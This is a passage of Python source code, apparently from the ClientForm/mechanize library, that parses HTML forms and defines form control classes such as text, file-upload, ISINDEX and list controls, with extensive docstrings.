_urljoin=_urllib.parse.urljoin,\n                    _urlparse=_urllib.parse.urlparse,\n                    _urlunparse=_urllib.parse.urlunparse,\n                    ):\n    \"\"\"Identical to ParseResponse, except that:\n\n    1. The returned list contains an extra item.  The first form in the list\n    contains all controls not contained in any FORM element.\n\n    2. The arguments ignore_errors and backwards_compat have been removed.\n\n    3. Backwards-compatibility mode (backwards_compat=True) is not available.\n    \"\"\"\n    return _ParseFileEx(response, response.geturl(),\n                        select_default,\n                        False,\n                        form_parser_class,\n                        request_class,\n                        entitydefs,\n                        False,\n                        encoding,\n                        _urljoin=_urljoin,\n                        _urlparse=_urlparse,\n                        _urlunparse=_urlunparse,\n                        )\n\ndef ParseFileEx(file, base_uri,\n                select_default=False,\n                form_parser_class=FormParser,\n                request_class=_urllib.request.Request,\n                entitydefs=None,\n                encoding=DEFAULT_ENCODING,\n\n                # private\n                _urljoin=_urllib.parse.urljoin,\n                _urlparse=_urllib.parse.urlparse,\n                _urlunparse=_urllib.parse.urlunparse,\n                ):\n    \"\"\"Identical to ParseFile, except that:\n\n    1. The returned list contains an extra item.  The first form in the list\n    contains all controls not contained in any FORM element.\n\n    2. The arguments ignore_errors and backwards_compat have been removed.\n\n    3. Backwards-compatibility mode (backwards_compat=True) is not available.\n    \"\"\"\n    return _ParseFileEx(file, base_uri,\n                        select_default,\n                        False,\n                        form_parser_class,\n                        request_class,\n                        entitydefs,\n                        False,\n                        encoding,\n                        _urljoin=_urljoin,\n                        _urlparse=_urlparse,\n                        _urlunparse=_urlunparse,\n                        )\n\ndef ParseResponse(response, *args, **kwds):\n    \"\"\"Parse HTTP response and return a list of HTMLForm instances.\n\n    The return value of urllib2.urlopen can be conveniently passed to this\n    function as the response parameter.\n\n    ClientForm.ParseError is raised on parse errors.\n\n    response: file-like object (supporting read() method) with a method\n     geturl(), returning the URI of the HTTP response\n    select_default: for multiple-selection SELECT controls and RADIO controls,\n     pick the first item as the default if none are selected in the HTML\n    form_parser_class: class to instantiate and use to pass\n    request_class: class to return from .click() method (default is\n     _urllib.request.Request)\n    entitydefs: mapping like {\"&amp;\": \"&\", ...} containing HTML entity\n     definitions (a sensible default is used)\n    encoding: character encoding used for encoding numeric character references\n     when matching link text.  ClientForm does not attempt to find the encoding\n     in a META HTTP-EQUIV attribute in the document itself (mechanize, for\n     example, does do that and will pass the correct value to ClientForm using\n     this parameter).\n\n    backwards_compat: boolean that determines whether the returned HTMLForm\n     objects are backwards-compatible with old code.  If backwards_compat is\n     true:\n\n     - ClientForm 0.1 code will continue to work as before.\n\n     - Label searches that do not specify a nr (number or count) will always\n       get the first match, even if other controls match.  If\n       backwards_compat is False, label searches that have ambiguous results\n       will raise an AmbiguityError.\n\n     - Item label matching is done by strict string comparison rather than\n       substring matching.\n\n     - De-selecting individual list items is allowed even if the Item is\n       disabled.\n\n    The backwards_compat argument will be deprecated in a future release.\n\n    Pass a true value for select_default if you want the behaviour specified by\n    RFC 1866 (the HTML 2.0 standard), which is to select the first item in a\n    RADIO or multiple-selection SELECT control if none were selected in the\n    HTML.  Most browsers (including Microsoft Internet Explorer (IE) and\n    Netscape Navigator) instead leave all items unselected in these cases.  The\n    W3C HTML 4.0 standard leaves this behaviour undefined in the case of\n    multiple-selection SELECT controls, but insists that at least one RADIO\n    button should be checked at all times, in contradiction to browser\n    behaviour.\n\n    There is a choice of parsers.  ClientForm.XHTMLCompatibleFormParser (uses\n    HTMLParser.HTMLParser) works best for XHTML, ClientForm.FormParser (uses\n    sgmllib.SGMLParser) (the default) works better for ordinary grubby HTML.\n    Note that HTMLParser is only available in Python 2.2 and later.  You can\n    pass your own class in here as a hack to work around bad HTML, but at your\n    own risk: there is no well-defined interface.\n\n    \"\"\"\n    return _ParseFileEx(response, response.geturl(), *args, **kwds)[1:]\n\ndef ParseFile(file, base_uri, *args, **kwds):\n    \"\"\"Parse HTML and return a list of HTMLForm instances.\n\n    ClientForm.ParseError is raised on parse errors.\n\n    file: file-like object (supporting read() method) containing HTML with zero\n     or more forms to be parsed\n    base_uri: the URI of the document (note that the base URI used to submit\n     the form will be that given in the BASE element if present, not that of\n     the document)\n\n    For the other arguments and further details, see ParseResponse.__doc__.\n\n    \"\"\"\n    return _ParseFileEx(file, base_uri, *args, **kwds)[1:]\n\ndef _ParseFileEx(file, base_uri,\n                 select_default=False,\n                 ignore_errors=False,\n                 form_parser_class=FormParser,\n                 request_class=_urllib.request.Request,\n                 entitydefs=None,\n                 backwards_compat=True,\n                 encoding=DEFAULT_ENCODING,\n                 _urljoin=_urllib.parse.urljoin,\n                 _urlparse=_urllib.parse.urlparse,\n                 _urlunparse=_urllib.parse.urlunparse,\n                 ):\n    if backwards_compat:\n        deprecation(\"operating in backwards-compatibility mode\", 1)\n    fp = form_parser_class(entitydefs, encoding)\n    while 1:\n        data = file.read(CHUNK)\n        try:\n            fp.feed(data)\n        except ParseError as e:\n            e.base_uri = base_uri\n            raise\n        if len(data) != CHUNK: break\n    fp.close()\n    if fp.base is not None:\n        # HTML BASE element takes precedence over document URI\n        base_uri = fp.base\n    labels = []  # Label(label) for label in fp.labels]\n    id_to_labels = {}\n    for l in fp.labels:\n        label = Label(l)\n        labels.append(label)\n        for_id = l[\"for\"]\n        coll = id_to_labels.get(for_id)\n        if coll is None:\n            id_to_labels[for_id] = [label]\n        else:\n            coll.append(label)\n    forms = []\n    for (name, action, method, enctype), attrs, controls in fp.forms:\n        if action is None:\n            action = base_uri\n        else:\n            action = six.text_type(action, \"utf8\") if action and isinstance(action, six.binary_type) else action\n            action = _urljoin(base_uri, action)\n        # would be nice to make HTMLForm class (form builder) pluggable\n        form = HTMLForm(\n            action, method, enctype, name, attrs, request_class,\n            forms, labels, id_to_labels, backwards_compat)\n        form._urlparse = _urlparse\n        form._urlunparse = _urlunparse\n        for ii in xrange(len(controls)):\n            type, name, attrs = controls[ii]\n            # index=ii*10 allows ImageControl to return multiple ordered pairs\n            form.new_control(\n                type, name, attrs, select_default=select_default, index=ii*10)\n        forms.append(form)\n    for form in forms:\n        try:\n            form.fixup()\n        except AttributeError as ex:\n            if not any(_ in str(ex) for _ in (\"is disabled\", \"is readonly\")):\n                raise\n    return forms\n\n\nclass Label:\n    def __init__(self, attrs):\n        self.id = attrs.get(\"for\")\n        self._text = attrs.get(\"__text\").strip()\n        self._ctext = compress_text(self._text)\n        self.attrs = attrs\n        self._backwards_compat = False  # maintained by HTMLForm\n\n    def __getattr__(self, name):\n        if name == \"text\":\n            if self._backwards_compat:\n                return self._text\n            else:\n                return self._ctext\n        return getattr(Label, name)\n\n    def __setattr__(self, name, value):\n        if name == \"text\":\n            # don't see any need for this, so make it read-only\n            raise AttributeError(\"text attribute is read-only\")\n        self.__dict__[name] = value\n\n    def __str__(self):\n        return \"<Label(id=%r, text=%r)>\" % (self.id, self.text)\n\n\ndef _get_label(attrs):\n    text = attrs.get(\"__label\")\n    if text is not None:\n        return Label(text)\n    else:\n        return None\n\nclass Control:\n    \"\"\"An HTML form control.\n\n    An HTMLForm contains a sequence of Controls.  The Controls in an HTMLForm\n    are accessed using the HTMLForm.find_control method or the\n    HTMLForm.controls attribute.\n\n    Control instances are usually constructed using the ParseFile /\n    ParseResponse functions.  If you use those functions, you can ignore the\n    rest of this paragraph.  A Control is only properly initialised after the\n    fixup method has been called.  In fact, this is only strictly necessary for\n    ListControl instances.  This is necessary because ListControls are built up\n    from ListControls each containing only a single item, and their initial\n    value(s) can only be known after the sequence is complete.\n\n    The types and values that are acceptable for assignment to the value\n    attribute are defined by subclasses.\n\n    If the disabled attribute is true, this represents the state typically\n    represented by browsers by 'greying out' a control.  If the disabled\n    attribute is true, the Control will raise AttributeError if an attempt is\n    made to change its value.  In addition, the control will not be considered\n    'successful' as defined by the W3C HTML 4 standard -- ie. it will\n    contribute no data to the return value of the HTMLForm.click* methods.  To\n    enable a control, set the disabled attribute to a false value.\n\n    If the readonly attribute is true, the Control will raise AttributeError if\n    an attempt is made to change its value.  To make a control writable, set\n    the readonly attribute to a false value.\n\n    All controls have the disabled and readonly attributes, not only those that\n    may have the HTML attributes of the same names.\n\n    On assignment to the value attribute, the following exceptions are raised:\n    TypeError, AttributeError (if the value attribute should not be assigned\n    to, because the control is disabled, for example) and ValueError.\n\n    If the name or value attributes are None, or the value is an empty list, or\n    if the control is disabled, the control is not successful.\n\n    Public attributes:\n\n    type: string describing type of control (see the keys of the\n     HTMLForm.type2class dictionary for the allowable values) (readonly)\n    name: name of control (readonly)\n    value: current value of control (subclasses may allow a single value, a\n     sequence of values, or either)\n    disabled: disabled state\n    readonly: readonly state\n    id: value of id HTML attribute\n\n    \"\"\"\n    def __init__(self, type, name, attrs, index=None):\n        \"\"\"\n        type: string describing type of control (see the keys of the\n         HTMLForm.type2class dictionary for the allowable values)\n        name: control name\n        attrs: HTML attributes of control's HTML element\n\n        \"\"\"\n        raise NotImplementedError()\n\n    def add_to_form(self, form):\n        self._form = form\n        form.controls.append(self)\n\n    def fixup(self):\n        pass\n\n    def is_of_kind(self, kind):\n        raise NotImplementedError()\n\n    def clear(self):\n        raise NotImplementedError()\n\n    def __getattr__(self, name): raise NotImplementedError()\n    def __setattr__(self, name, value): raise NotImplementedError()\n\n    def pairs(self):\n        \"\"\"Return list of (key, value) pairs suitable for passing to urlencode.\n        \"\"\"\n        return [(k, v) for (i, k, v) in self._totally_ordered_pairs()]\n\n    def _totally_ordered_pairs(self):\n        \"\"\"Return list of (key, value, index) tuples.\n\n        Like pairs, but allows preserving correct ordering even where several\n        controls are involved.\n\n        \"\"\"\n        raise NotImplementedError()\n\n    def _write_mime_data(self, mw, name, value):\n        \"\"\"Write data for a subitem of this control to a MimeWriter.\"\"\"\n        # called by HTMLForm\n        mw2 = mw.nextpart()\n        mw2.addheader(\"Content-Disposition\",\n                      'form-data; name=\"%s\"' % name, 1)\n        f = mw2.startbody(prefix=0)\n        f.write(value)\n\n    def __str__(self):\n        raise NotImplementedError()\n\n    def get_labels(self):\n        \"\"\"Return all labels (Label instances) for this control.\n\n        If the control was surrounded by a <label> tag, that will be the first\n        label; all other labels, connected by 'for' and 'id', are in the order\n        that appear in the HTML.\n\n        \"\"\"\n        res = []\n        if self._label:\n            res.append(self._label)\n        if self.id:\n            res.extend(self._form._id_to_labels.get(self.id, ()))\n        return res\n\n\n#---------------------------------------------------\nclass ScalarControl(Control):\n    \"\"\"Control whose value is not restricted to one of a prescribed set.\n\n    Some ScalarControls don't accept any value attribute.  Otherwise, takes a\n    single value, which must be string-like.\n\n    Additional read-only public attribute:\n\n    attrs: dictionary mapping the names of original HTML attributes of the\n     control to their values\n\n    \"\"\"\n    def __init__(self, type, name, attrs, index=None):\n        self._index = index\n        self._label = _get_label(attrs)\n        self.__dict__[\"type\"] = type.lower()\n        self.__dict__[\"name\"] = name\n        self._value = attrs.get(\"value\")\n        self.disabled = \"disabled\" in attrs\n        self.readonly = \"readonly\" in attrs\n        self.id = attrs.get(\"id\")\n\n        self.attrs = attrs.copy()\n\n        self._clicked = False\n\n        self._urlparse = _urllib.parse.urlparse\n        self._urlunparse = _urllib.parse.urlunparse\n\n    def __getattr__(self, name):\n        if name == \"value\":\n            return self.__dict__[\"_value\"]\n        else:\n            raise AttributeError(\"%s instance has no attribute '%s'\" %\n                                 (self.__class__.__name__, name))\n\n    def __setattr__(self, name, value):\n        if name == \"value\":\n            if not isstringlike(value):\n                raise TypeError(\"must assign a string\")\n            elif self.readonly:\n                raise AttributeError(\"control '%s' is readonly\" % self.name)\n            elif self.disabled:\n                raise AttributeError(\"control '%s' is disabled\" % self.name)\n            self.__dict__[\"_value\"] = value\n        elif name in (\"name\", \"type\"):\n            raise AttributeError(\"%s attribute is readonly\" % name)\n        else:\n            self.__dict__[name] = value\n\n    def _totally_ordered_pairs(self):\n        name = self.name\n        value = self.value\n        if name is None or value is None or self.disabled:\n            return []\n        return [(self._index, name, value)]\n\n    def clear(self):\n        if self.readonly:\n            raise AttributeError(\"control '%s' is readonly\" % self.name)\n        self.__dict__[\"_value\"] = None\n\n    def __str__(self):\n        name = self.name\n        value = self.value\n        if name is None: name = \"<None>\"\n        if value is None: value = \"<None>\"\n\n        infos = []\n        if self.disabled: infos.append(\"disabled\")\n        if self.readonly: infos.append(\"readonly\")\n        info = \", \".join(infos)\n        if info: info = \" (%s)\" % info\n\n        return \"<%s(%s=%s)%s>\" % (self.__class__.__name__, name, value, info)\n\n\n#---------------------------------------------------\nclass TextControl(ScalarControl):\n    \"\"\"Textual input control.\n\n    Covers:\n\n    INPUT/TEXT\n    INPUT/PASSWORD\n    INPUT/HIDDEN\n    TEXTAREA\n\n    \"\"\"\n    def __init__(self, type, name, attrs, index=None):\n        ScalarControl.__init__(self, type, name, attrs, index)\n        if self.type == \"hidden\": self.readonly = True\n        if self._value is None:\n            self._value = \"\"\n\n    def is_of_kind(self, kind): return kind == \"text\"\n\n#---------------------------------------------------\nclass FileControl(ScalarControl):\n    \"\"\"File upload with INPUT TYPE=FILE.\n\n    The value attribute of a FileControl is always None.  Use add_file instead.\n\n    Additional public method: add_file\n\n    \"\"\"\n\n    def __init__(self, type, name, attrs, index=None):\n        ScalarControl.__init__(self, type, name, attrs, index)\n        self._value = None\n        self._upload_data = []\n\n    def is_of_kind(self, kind): return kind == \"file\"\n\n    def clear(self):\n        if self.readonly:\n            raise AttributeError(\"control '%s' is readonly\" % self.name)\n        self._upload_data = []\n\n    def __setattr__(self, name, value):\n        if name in (\"value\", \"name\", \"type\"):\n            raise AttributeError(\"%s attribute is readonly\" % name)\n        else:\n            self.__dict__[name] = value\n\n    def add_file(self, file_object, content_type=None, filename=None):\n        if not hasattr(file_object, \"read\"):\n            raise TypeError(\"file-like object must have read method\")\n        if content_type is not None and not isstringlike(content_type):\n            raise TypeError(\"content type must be None or string-like\")\n        if filename is not None and not isstringlike(filename):\n            raise TypeError(\"filename must be None or string-like\")\n        if content_type is None:\n            content_type = \"application/octet-stream\"\n        self._upload_data.append((file_object, content_type, filename))\n\n    def _totally_ordered_pairs(self):\n        # XXX should it be successful even if unnamed?\n        if self.name is None or self.disabled:\n            return []\n        return [(self._index, self.name, \"\")]\n\n    def _write_mime_data(self, mw, _name, _value):\n        # called by HTMLForm\n        # assert _name == self.name and _value == ''\n        if len(self._upload_data) < 2:\n            if len(self._upload_data) == 0:\n                file_object = _cStringIO()\n                content_type = \"application/octet-stream\"\n                filename = \"\"\n            else:\n                file_object, content_type, filename = self._upload_data[0]\n                if filename is None:\n                    filename = \"\"\n            mw2 = mw.nextpart()\n            fn_part = '; filename=\"%s\"' % filename\n            disp = 'form-data; name=\"%s\"%s' % (self.name, fn_part)\n            mw2.addheader(\"Content-Disposition\", disp, prefix=1)\n            fh = mw2.startbody(content_type, prefix=0)\n            fh.write(file_object.read())\n        else:\n            # multiple files\n            mw2 = mw.nextpart()\n            disp = 'form-data; name=\"%s\"' % self.name\n            mw2.addheader(\"Content-Disposition\", disp, prefix=1)\n            fh = mw2.startmultipartbody(\"mixed\", prefix=0)\n            for file_object, content_type, filename in self._upload_data:\n                mw3 = mw2.nextpart()\n                if filename is None:\n                    filename = \"\"\n                fn_part = '; filename=\"%s\"' % filename\n                disp = \"file%s\" % fn_part\n                mw3.addheader(\"Content-Disposition\", disp, prefix=1)\n                fh2 = mw3.startbody(content_type, prefix=0)\n                fh2.write(file_object.read())\n            mw2.lastpart()\n\n    def __str__(self):\n        name = self.name\n        if name is None: name = \"<None>\"\n\n        if not self._upload_data:\n            value = \"<No files added>\"\n        else:\n            value = []\n            for file, ctype, filename in self._upload_data:\n                if filename is None:\n                    value.append(\"<Unnamed file>\")\n                else:\n                    value.append(filename)\n            value = \", \".join(value)\n\n        info = []\n        if self.disabled: info.append(\"disabled\")\n        if self.readonly: info.append(\"readonly\")\n        info = \", \".join(info)\n        if info: info = \" (%s)\" % info\n\n        return \"<%s(%s=%s)%s>\" % (self.__class__.__name__, name, value, info)\n\n\n#---------------------------------------------------\nclass IsindexControl(ScalarControl):\n    \"\"\"ISINDEX control.\n\n    ISINDEX is the odd-one-out of HTML form controls.  In fact, it isn't really\n    part of regular HTML forms at all, and predates it.  You're only allowed\n    one ISINDEX per HTML document.  ISINDEX and regular form submission are\n    mutually exclusive -- either submit a form, or the ISINDEX.\n\n    Having said this, since ISINDEX controls may appear in forms (which is\n    probably bad HTML), ParseFile / ParseResponse will include them in the\n    HTMLForm instances it returns.  You can set the ISINDEX's value, as with\n    any other control (but note that ISINDEX controls have no name, so you'll\n    need to use the type argument of set_value!).  When you submit the form,\n    the ISINDEX will not be successful (ie., no data will get returned to the\n    server as a result of its presence), unless you click on the ISINDEX\n    control, in which case the ISINDEX gets submitted instead of the form:\n\n    form.set_value(\"my isindex value\", type=\"isindex\")\n    urllib2.urlopen(form.click(type=\"isindex\"))\n\n    ISINDEX elements outside of FORMs are ignored.  If you want to submit one\n    by hand, do it like so:\n\n    url = _urllib.parse.urljoin(page_uri, \"?\"+_urllib.parse.quote_plus(\"my isindex value\"))\n    result = urllib2.urlopen(url)\n\n    \"\"\"\n    def __init__(self, type, name, attrs, index=None):\n        ScalarControl.__init__(self, type, name, attrs, index)\n        if self._value is None:\n            self._value = \"\"\n\n    def is_of_kind(self, kind): return kind in [\"text\", \"clickable\"]\n\n    def _totally_ordered_pairs(self):\n        return []\n\n    def _click(self, form, coord, return_type, request_class=_urllib.request.Request):\n        # Relative URL for ISINDEX submission: instead of \"foo=bar+baz\",\n        # want \"bar+baz\".\n        # This doesn't seem to be specified in HTML 4.01 spec. (ISINDEX is\n        # deprecated in 4.01, but it should still say how to submit it).\n        # Submission of ISINDEX is explained in the HTML 3.2 spec, though.\n        parts = self._urlparse(form.action)\n        rest, (query, frag) = parts[:-2], parts[-2:]\n        parts = rest + (_urllib.parse.quote_plus(self.value), None)\n        url = self._urlunparse(parts)\n        req_data = url, None, []\n\n        if return_type == \"pairs\":\n            return []\n        elif return_type == \"request_data\":\n            return req_data\n        else:\n            return request_class(url)\n\n    def __str__(self):\n        value = self.value\n        if value is None: value = \"<None>\"\n\n        infos = []\n        if self.disabled: infos.append(\"disabled\")\n        if self.readonly: infos.append(\"readonly\")\n        info = \", \".join(infos)\n        if info: info = \" (%s)\" % info\n\n        return \"<%s(%s)%s>\" % (self.__class__.__name__, value, info)\n\n\n#---------------------------------------------------\nclass IgnoreControl(ScalarControl):\n    \"\"\"Control that we're not interested in.\n\n    Covers:\n\n    INPUT/RESET\n    BUTTON/RESET\n    INPUT/BUTTON\n    BUTTON/BUTTON\n\n    These controls are always unsuccessful, in the terminology of HTML 4 (ie.\n    they never require any information to be returned to the server).\n\n    BUTTON/BUTTON is used to generate events for script embedded in HTML.\n\n    The value attribute of IgnoreControl is always None.\n\n    \"\"\"\n    def __init__(self, type, name, attrs, index=None):\n        ScalarControl.__init__(self, type, name, attrs, index)\n        self._value = None\n\n    def is_of_kind(self, kind): return False\n\n    def __setattr__(self, name, value):\n        if name == \"value\":\n            raise AttributeError(\n                \"control '%s' is ignored, hence read-only\" % self.name)\n        elif name in (\"name\", \"type\"):\n            raise AttributeError(\"%s attribute is readonly\" % name)\n        else:\n            self.__dict__[name] = value\n\n\n#---------------------------------------------------\n# ListControls\n\n# helpers and subsidiary classes\n\nclass Item:\n    def __init__(self, control, attrs, index=None):\n        label = _get_label(attrs)\n        self.__dict__.update({\n            \"name\": attrs[\"value\"],\n            \"_labels\": label and [label] or [],\n            \"attrs\": attrs,\n            \"_control\": control,\n            \"disabled\": \"disabled\" in attrs,\n            \"_selected\": False,\n            \"id\": attrs.get(\"id\"),\n            \"_index\": index,\n            })\n        control.items.append(self)\n\n    def get_labels(self):\n        \"\"\"Return all labels (Label instances) for this item.\n\n        For items that represent radio buttons or checkboxes, if the item was\n        surrounded by a <label> tag, that will be the first label; all other\n        labels, connected by 'for' and 'id', are in the order that appear in\n        the HTML.\n\n        For items that represent select options, if the option had a label\n        attribute, that will be the first label.  If the option has contents\n        (text within the option tags) and it is not the same as the label\n        attribute (if any), that will be a label.  There is nothing in the\n        spec to my knowledge that makes an option with an id unable to be the\n        target of a label's for attribute, so those are included, if any, for\n        the sake of consistency and completeness.\n\n        \"\"\"\n        res = []\n        res.extend(self._labels)\n        if self.id:\n            res.extend(self._control._form._id_to_labels.get(self.id, ()))\n        return res\n\n    def __getattr__(self, name):\n        if name==\"selected\":\n            return self._selected\n        raise AttributeError(name)\n\n    def __setattr__(self, name, value):\n        if name == \"selected\":\n            self._control._set_selected_state(self, value)\n        elif name == \"disabled\":\n            self.__dict__[\"disabled\"] = bool(value)\n        else:\n            raise AttributeError(name)\n\n    def __str__(self):\n        res = self.name\n        if self.selected:\n            res = \"*\" + res\n        if self.disabled:\n            res = \"(%s)\" % res\n        return res\n\n    def __repr__(self):\n        # XXX appending the attrs without distinguishing them from name and id\n        # is silly\n        attrs = [(\"name\", self.name), (\"id\", self.id)]+self.attrs.items()\n        return \"<%s %s>\" % (\n            self.__class__.__name__,\n            \" \".join([\"%s=%r\" % (k, v) for k, v in attrs])\n            )\n\ndef disambiguate(items, nr, **kwds):\n    msgs = []\n    for key, value in kwds.items():\n        msgs.append(\"%s=%r\" % (key, value))\n    msg = \" \".join(msgs)\n    if not items:\n        raise ItemNotFoundError(msg)\n    if nr is None:\n        if len(items) > 1:\n            raise AmbiguityError(msg)\n        nr = 0\n    if len(items) <= nr:\n        raise ItemNotFoundError(msg)\n    return items[nr]\n\nclass ListControl(Control):\n    \"\"\"Control representing a sequence of items.\n\n    The value attribute of a ListControl represents the successful list items\n    in the control.  The successful list items are those that are selected and\n    not disabled.\n\n    ListControl implements both list controls that take a length-1 value\n    (single-selection) and those that take length >1 values\n    (multiple-selection).\n\n    ListControls accept sequence values only.  Some controls only accept\n    sequences of length 0 or 1 (RADIO, and single-selection SELECT).\n    In those cases, ItemCountError is raised if len(sequence) > 1.  CHECKBOXes\n    and multiple-selection SELECTs (those having the \"multiple\" HTML attribute)\n    accept sequences of any length.\n\n    Note the following mistake:\n\n    control.value = some_value\n    assert control.value == some_value    # not necessarily true\n\n    The reason for this is that the value attribute always gives the list items\n    in the order they were listed in the HTML.\n\n    ListControl items can also be referred to by their labels instead of names.\n    Use the label argument to .get(), and the .set_value_by_label(),\n    .get_value_by_label() methods.\n\n    Note that, rather confusingly, though SELECT controls are represented in\n    HTML by SELECT elements (which contain OPTION elements, representing\n    individual list items), CHECKBOXes and RADIOs are not represented by *any*\n    element.  Instead, those controls are represented by a collection of INPUT\n    elements.  For example, this is a SELECT control, named \"control1\":\n\n    <select name=\"control1\">\n     <option>foo</option>\n     <option value=\"1\">bar</option>\n    </select>\n\n    and this is a CHECKBOX control, named \"control2\":\n\n    <input type=\"checkbox\" name=\"control2\" value=\"foo\" id=\"cbe1\">\n    <input type=\"checkbox\" name=\"control2\" value=\"bar\" id=\"cbe2\">\n\n    The id attribute of a CHECKBOX or RADIO ListControl is always that of its\n    first element (for example, \"cbe1\" above).\n\n\n    Additional read-only public attribute: multiple.\n\n    \"\"\"\n\n    # ListControls are built up by the parser from their component items by\n    # creating one ListControl per item, consolidating them into a single\n    # master ListControl held by the HTMLForm:\n\n    # -User calls form.new_control(...)\n    # -Form creates Control, and calls control.add_to_form(self).\n    # -Control looks for a Control with the same name and type in the form,\n    #  and if it finds one, merges itself with that control by calling\n    #  control.merge_control(self).  The first Control added to the form, of\n    #  a particular name and type, is the only one that survives in the\n    #  form.\n    # -Form calls control.fixup for all its controls.  ListControls in the\n    #  form know they can now safely pick their default values.\n\n    # To create a ListControl without an HTMLForm, use:\n\n    # control.merge_control(new_control)\n\n    # (actually, it's much easier just to use ParseFile)\n\n    _label = None\n\n    def __init__(self, type, name, attrs={}, select_default=False,\n                 called_as_base_class=False, index=None):\n        \"\"\"\n        select_default: for RADIO and multiple-selection SELECT controls, pick\n         the first item as the default if no 'selected' HTML attribute is\n         present\n\n        \"\"\"\n        if not called_as_base_class:\n            raise NotImplementedError()\n\n        self.__dict__[\"type\"] = type.lower()\n        self.__dict__[\"name\"] = name\n        self._value = attrs.get(\"value\")\n        self.disabled = False\n        self.readonly = False\n        self.id = attrs.get(\"id\")\n        self._closed = False\n\n        # As Controls are merged in with .merge_control(), self.attrs will\n        # refer to each Control in turn -- always the most recently merged\n        # control.  Each merged-in Control instance corresponds to a single\n        # list item: see ListControl.__doc__.\n        self.items = []\n        self._form = None\n\n        self._select_default = select_default\n        self._clicked = False\n\n    def clear(self):\n        self.value = []\n\n    def is_of_kind(self, kind):\n        if kind  == \"list\":\n            return True\n        elif kind == \"multilist\":\n            return bool(self.multiple)\n        elif kind == \"singlelist\":\n            return not self.multiple\n        else:\n            return False\n\n    def get_items(self, name=None, label=None, id=None,\n                  exclude_disabled=False):\n        \"\"\"Return matching items by name or label.\n\n        For argument docs, see the docstring for .get()\n\n        \"\"\"\n        if name is not None and not isstringlike(name):\n            raise TypeError(\"item name must be string-like\")\n        if label is not None and not isstringlike(label):\n            raise TypeError(\"item label must be string-like\")\n        if id is not None and not isstringlike(id):\n            raise TypeError(\"item id must be string-like\")\n        items = []  # order is important\n        compat = self._form.backwards_compat\n        for o in self.items:\n            if exclude_disabled and o.disabled:\n                continue\n            if name is not None and o.name != name:\n                continue\n            if label is not None:\n                for l in o.get_labels():\n                    if ((compat and l.text == label) or\n                        (not compat and l.text.find(label) > -1)):\n                        break\n                else:\n                    continue\n            if id is not None and o.id != id:\n                continue\n            items.append(o)\n        return items\n\n    def get(self, name=None, label=None, id=None, nr=None,\n            exclude_disabled=False):\n        \"\"\"Return item by name or label, disambiguating if necessary with nr.\n\n        All arguments must be passed by name, with the exception of 'name',\n        which may be used as a positional argument.\n\n        If name is specified, then the item must have the indicated name.\n\n        If label is specified, then the item must have a label whose\n        whitespace-compressed, stripped, text substring-matches the indicated\n        label string (eg. label=\"please choose\" will match\n        \"  Do  please  choose an item \").\n\n        If id is specified, then the item must have the indicated id.\n\n        nr is an optional 0-based index of the items matching the query.\n\n        If nr is the default None value and more than item is found, raises\n        AmbiguityError (unless the HTMLForm instance's backwards_compat\n        attribute is true).\n\n        If no item is found, or if items are found but nr is specified and not\n        found, raises ItemNotFoundError.\n\n        Optionally excludes disabled items.\n\n        \"\"\"\n        if nr is None and self._form.backwards_compat:\n            nr = 0  # :-/\n        items = self.get_items(name, label, id, exclude_disabled)\n        return disambiguate(items, nr, name=name, label=label, id=id)\n\n    def _get(self, name, by_label=False, nr=None, exclude_disabled=False):\n        # strictly for use by deprecated methods\n        if by_label:\n            name, label = None, name\n        else:\n            name, label = name, None\n        return self.get(name, label, nr, exclude_disabled)\n\n    def toggle(self, name, by_label=False, nr=None):\n        \"\"\"Deprecated: given a name or label and optional disambiguating index\n        nr, toggle the matching item's selection.\n\n        Selecting items follows the behavior described in the docstring of the\n        'get' method.\n\n        if the item is disabled, or this control is disabled or readonly,\n        raise AttributeError.\n\n        \"\"\"\n        deprecation(\n            \"item = control.get(...); item.selected = not item.selected\")\n        o = self._get(name, by_label, nr)\n        self._set_selected_state(o, not o.selected)\n\n    def set(self, selected, name, by_label=False, nr=None):\n        \"\"\"Deprecated: given a name or label and optional disambiguating index\n        nr, set the matching item's selection to the bool value of selected.\n\n        Selecting items follows the behavior described in the docstring of the\n        'get' method.\n\n        if the item is disabled, or this control is disabled or readonly,\n        raise AttributeError.\n\n        \"\"\"\n        deprecation(\n            \"control.get(...).selected = <boolean>\")\n        self._set_selected_state(self._get(name, by_label, nr), selected)\n\n    def _set_selected_state(self, item, action):\n        # action:\n        # bool False: off\n        # bool True: on\n        if self.disabled:\n            raise AttributeError(\"control '%s' is disabled\" % self.name)\n        if self.readonly:\n            raise AttributeError(\"control '%s' is readonly\" % self.name)\n        action = bool(action)\n        compat = self._form.backwards_compat\n        if not compat and item.disabled:\n            raise AttributeError(\"item is disabled\")\n        else:\n            if compat and item.disabled and action:\n                raise AttributeError(\"item is disabled\")\n            if self.multiple:\n                item.__dict__[\"_selected\"] = action\n            else:\n                if not action:\n                    item.__dict__[\"_selected\"] = False\n                else:\n                    for o in self.items:\n                        o.__dict__[\"_selected\"] = False\n                    item.__dict__[\"_selected\"] = True\n\n    def toggle_single(self, by_label=None):\n        \"\"\"Deprecated: toggle the selection of the single item in this control.\n\n        Raises ItemCountError if the control does not contain only one item.\n\n        by_label argument is ignored, and included only for backwards\n        compatibility.\n\n        \"\"\"\n        deprecation(\n            \"control.items[0].selected = not control.items[0].selected\")\n        if len(self.items) != 1:\n            raise ItemCountError(\n                \"'%s' is not a single-item control\" % self.name)\n        item = self.items[0]\n        self._set_selected_state(item, not item.selected)\n\n    def set_single(self, selected, by_label=None):\n        \"\"\"Deprecated: set the selection of the single item in this control.\n\n        Raises ItemCountError if the control does not contain only one item.\n\n        by_label argument is ignored, and included only for backwards\n        compatibility.\n\n        \"\"\"\n        deprecation(\n            \"control.items[0].selected = <boolean>\")\n        if len(self.items) != 1:\n            raise ItemCountError(\n                \"'%s' is not a single-item control\" % self.name)\n        self._set_selected_state(self.items[0], selected)\n\n    def get_item_disabled(self, name, by_label=False, nr=None):\n        \"\"\"Get disabled state of named list item in a ListControl.\"\"\"\n        deprecation(\n            \"control.get(...).disabled\")\n        return self._get(name, by_label, nr).disabled\n\n    def set_item_disabled(self, disabled, name, by_label=False, nr=None):\n        \"\"\"Set disabled state of named list item in a ListControl.\n\n        disabled: boolean disabled state\n\n        \"\"\"\n        deprecation(\n            \"control.get(...).disabled = <boolean>\")\n        self._get(name, by_label, nr).disabled = disabled\n\n    def set_all_items_disabled(self, disabled):\n        \"\"\"Set disabled state of all list items in a ListControl.\n\n        disabled: boolean disabled state\n\n        \"\"\"\n        for o in self.items:\n            o.disabled = disabled\n\n    def get_item_attrs(self, name, by_label=False, nr=None):\n        